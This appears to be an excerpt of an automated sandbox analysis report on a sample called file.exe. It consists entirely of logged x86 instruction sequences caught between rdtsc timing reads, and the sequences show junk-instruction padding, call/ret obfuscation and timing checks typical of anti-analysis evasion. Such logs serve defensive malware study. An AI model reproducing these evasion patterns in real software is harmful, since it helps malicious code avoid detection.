Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E79DCA second address: E79DF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDE71263CEFh 0x0000000b push ebx 0x0000000c ja 00007FDE71263CE6h 0x00000012 pop ebx 0x00000013 pushad 0x00000014 jp 00007FDE71263CE6h 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7A229 second address: E7A233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FDE70D000C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7A233 second address: E7A23E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7A23E second address: E7A277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE70D000D7h 0x00000009 jmp 00007FDE70D000D8h 0x0000000e popad 0x0000000f pop eax 0x00000010 push edi 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7A6AB second address: E7A6BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CEBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7FFF1 second address: E7FFF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7FFF5 second address: E80003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E80003 second address: E8000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7E954 second address: E7E971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE71263CF6h 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7E971 second address: E7E977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7EADC second address: E7EAE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7EAE1 second address: E7EAE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7EAE9 second address: E7EB02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FDE71263CEEh 0x0000000b ja 00007FDE71263CE6h 0x00000011 push eax 0x00000012 pop eax 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push ebx 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7EB02 second address: E7EB12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push edi 0x00000008 jo 00007FDE70D000C6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7F03B second address: E7F041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7F041 second address: E7F045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7F045 second address: E7F049 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7F049 second address: E7F057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FDE70D000CEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7F057 second address: E7F067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7F067 second address: E7F06B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7F659 second address: E7F663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FDE71263CE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7F663 second address: E7F6A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007FDE70D000C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jno 00007FDE70D000CCh 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 jmp 00007FDE70D000D8h 0x0000001c pushad 0x0000001d popad 0x0000001e pop ebx 0x0000001f jc 00007FDE70D000C8h 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7F6A3 second address: E7F6B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jne 00007FDE71263CE6h 0x0000000b push esi 0x0000000c pop esi 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7F9F5 second address: E7F9FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7F9FB second address: E7F9FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E2E220 second address: E2E241 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 jmp 00007FDE70D000CEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jg 00007FDE70D000FDh 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0FEAA second address: E0FEB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0FEB0 second address: E0FEB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7FE6A second address: E7FE6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E84D2C second address: E84D30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E84D30 second address: E84D34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E84D34 second address: E84D4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDE70D000CCh 0x0000000b popad 0x0000000c pushad 0x0000000d push ebx 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8A378 second address: E8A395 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE71263CF7h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E89116 second address: E8911C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E896F8 second address: E8970E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CECh 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007FDE71263CE6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8970E second address: E89718 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FDE70D000C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E89718 second address: E8974A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jp 00007FDE71263CEEh 0x0000000f jmp 00007FDE71263CEEh 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FDE71263CEBh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E88E33 second address: E88E38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E88E38 second address: E88E57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF9h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E88E57 second address: E88E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E89B55 second address: E89B5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E89B5A second address: E89B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E89CDE second address: E89CED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE71263CEBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E89E2B second address: E89E31 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E89E31 second address: E89E36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E89E36 second address: E89E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E903A0 second address: E903BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FDE71263CE6h 0x0000000a pop ebx 0x0000000b jnp 00007FDE71263CF6h 0x00000011 pushad 0x00000012 jo 00007FDE71263CE6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8F1A0 second address: E8F1AA instructions: 0x00000000 rdtsc 0x00000002 je 00007FDE70D000C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8F1AA second address: E8F1C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE71263CF0h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E46B88 second address: E46B8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E46B8D second address: E46BAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E46BAD second address: E46BB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E46C75 second address: E46C7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E46C7B second address: E46C8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007FDE70D000C6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E46FE7 second address: E46FED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E46FED second address: E4700E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007FDE70D000C6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4700E second address: E47028 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E47120 second address: E47124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E471DF second address: E471E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E471E5 second address: E47215 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 4E39F814h 0x0000000f jmp 00007FDE70D000D6h 0x00000014 push CF50B7E1h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push edi 0x0000001e pop edi 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E47215 second address: E4721B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4721B second address: E47226 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FDE70D000C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E47388 second address: E47392 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FDE71263CE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E47447 second address: E47450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E475C9 second address: E475E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E47A82 second address: E47A86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E47D2E second address: E47D86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jng 00007FDE71263CE6h 0x0000000c pop edi 0x0000000d popad 0x0000000e nop 0x0000000f call 00007FDE71263CF8h 0x00000014 mov edx, dword ptr [ebp+122D2C1Bh] 0x0000001a pop ecx 0x0000001b lea eax, dword ptr [ebp+12486921h] 0x00000021 push 00000000h 0x00000023 push edi 0x00000024 call 00007FDE71263CE8h 0x00000029 pop edi 0x0000002a mov dword ptr [esp+04h], edi 0x0000002e add dword ptr [esp+04h], 00000015h 0x00000036 inc edi 0x00000037 push edi 0x00000038 ret 0x00000039 pop edi 0x0000003a ret 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E47D86 second address: E47D8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E47D8A second address: E47DA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E47DA4 second address: E2E220 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FDE70D000C8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 push esi 0x00000027 mov dword ptr [ebp+122D2081h], eax 0x0000002d pop edi 0x0000002e call dword ptr [ebp+122D2041h] 0x00000034 push eax 0x00000035 push edx 0x00000036 push edx 0x00000037 jg 00007FDE70D000C6h 0x0000003d js 00007FDE70D000C6h 0x00000043 pop edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8F508 second address: E8F516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8F516 second address: E8F51C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8F676 second address: E8F68E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8F68E second address: E8F6B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FDE70D000C6h 0x0000000a jmp 00007FDE70D000D9h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8F6B2 second address: E8F6DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE71263CF5h 0x00000009 jmp 00007FDE71263CF2h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8FCB6 second address: E8FCBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8FCBD second address: E8FCCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E95332 second address: E95355 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FDE70D000D2h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E04050 second address: E04057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E94E5C second address: E94E99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jns 00007FDE70D000CCh 0x0000000e jp 00007FDE70D000CAh 0x00000014 push edx 0x00000015 pop edx 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 push ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c ja 00007FDE70D000C6h 0x00000022 jmp 00007FDE70D000D5h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E94E99 second address: E94EB8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDE71263CF5h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E95033 second address: E95037 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9BF47 second address: E9BF5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FDE71263CE6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jnc 00007FDE71263CEAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9BF5E second address: E9BF69 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jns 00007FDE70D000C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9C7F5 second address: E9C7FF instructions: 0x00000000 rdtsc 0x00000002 jc 00007FDE71263CF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFA1D3 second address: DFA1E1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jg 00007FDE70D000C6h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFA1E1 second address: DFA1E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFA1E7 second address: DFA1EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9F1D0 second address: E9F1D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9F1D4 second address: E9F1EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE70D000D1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9F36A second address: E9F3A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnl 00007FDE71263CE6h 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c jmp 00007FDE71263CEFh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FDE71263CF6h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9F3A2 second address: E9F3C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9F3C3 second address: E9F3D7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDE71263CEAh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9F3D7 second address: E9F3DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA4ED0 second address: EA4ED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA4ED4 second address: EA4ED8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA5007 second address: EA500B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4774E second address: E47758 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FDE70D000C6h 0x0000000a rdtsc
